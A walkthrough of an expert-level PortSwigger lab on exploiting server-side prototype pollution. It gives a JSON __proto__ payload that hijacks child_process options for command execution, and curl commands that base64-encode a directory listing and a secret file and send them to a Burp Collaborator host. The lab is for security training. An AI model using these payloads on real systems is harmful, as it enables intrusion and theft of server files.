portswigger-all-labs

Complete PortSwigger Web Security Academy Lab Writeups. Detailed, categorized solutions for every lab, from APPRENTICE to EXPERT, covering all 30 vulnerability types.


Labs Covered

This write-up focuses on the following EXPERT-level lab from the PortSwigger Web Security Academy related to Prototype Pollution:

10. Exfiltrating sensitive data via server-side prototype pollution

This lab demonstrates how attackers can leverage server-side prototype pollution to extract sensitive information from the application.

LAB 10 - Exfiltrating sensitive data via server-side prototype pollution

Lab Description


Solution

Study the address change feature

Log in and visit your account page.


Submit the form for updating your billing and delivery address.


In Burp, go to the Proxy > HTTP history tab and find the POST /my-account/change-address request.

Observe that when you submit the form, the data from the fields is sent to the server as JSON. Notice that the server responds with a JSON object that appears to represent your user. This has been updated to reflect your new address information.

Send the request to Burp Repeater.


[Screenshot: the Repeater response showing the updated address data]


Identify a prototype pollution source

  1. In Repeater, add a new property to the JSON with the name __proto__, containing an object with a json spaces property:

    "__proto__": {
      "json spaces": 10
    }
    
  2. Send the request.
  3. In the Response panel, switch to the Raw tab. Notice that the JSON indentation has increased based on the value of your injected property. This strongly suggests that you have successfully polluted the prototype.

Probe for remote code execution

Go to the admin panel and observe that there’s a button for running maintenance jobs.


Click the button and observe that this triggers background tasks that clean up the database and filesystem. This is a classic example of the kind of functionality that may spawn Node child processes.


Try polluting the prototype with a set of malicious properties that control the options passed to the child_process.execSync() method. The injected command should trigger an interaction with the public Burp Collaborator server:

"__proto__": {
  "shell": "vim",
  "input": ":! curl https://YOUR-COLLABORATOR-ID.oastify.com\n"
}

Send the request.


After sending the request, go to the browser, go to the admin panel, and trigger the maintenance jobs to run.


Observe that, after a short delay, these fail.


In Burp, go to the Collaborator tab and poll for interactions. Observe that you have received several interactions. This confirms the remote code execution.



Leak the hidden file name

In Burp Repeater, modify the payload in your malicious input parameter to a command that leaks the contents of Carlos’s home directory to the public Burp Collaborator server. The following is one approach for doing this:

"input": ":! ls /home/carlos | base64 | curl -d @- https://YOUR-COLLABORATOR-ID.oastify.com\n"

Send the request.


In the browser, go to the admin panel and trigger the maintenance jobs again.


Go to the Collaborator tab and poll for interactions. Notice that you have received a new HTTP POST request with a Base64-encoded body.


Decode the contents of the body to reveal the names of two entries: node_apps and secret.



Exfiltrate the contents of the secret file

In Burp Repeater, modify the payload in your malicious input parameter to a command that exfiltrates the contents of the file /home/carlos/secret to the public Burp Collaborator server. The following is one approach for doing this:

"input": ":! cat /home/carlos/secret | base64 | curl -d @- https://YOUR-COLLABORATOR-ID.oastify.com\n"

Send the request.


In the browser, go to the admin panel and trigger the maintenance jobs again.


Go to the Collaborator tab and poll for interactions. Notice that you have received a new HTTP POST request with a Base64-encoded body.


Decode the contents of the body to reveal the secret.


In your browser, go to the lab banner and click Submit solution. Submit the decoded secret to solve the lab.
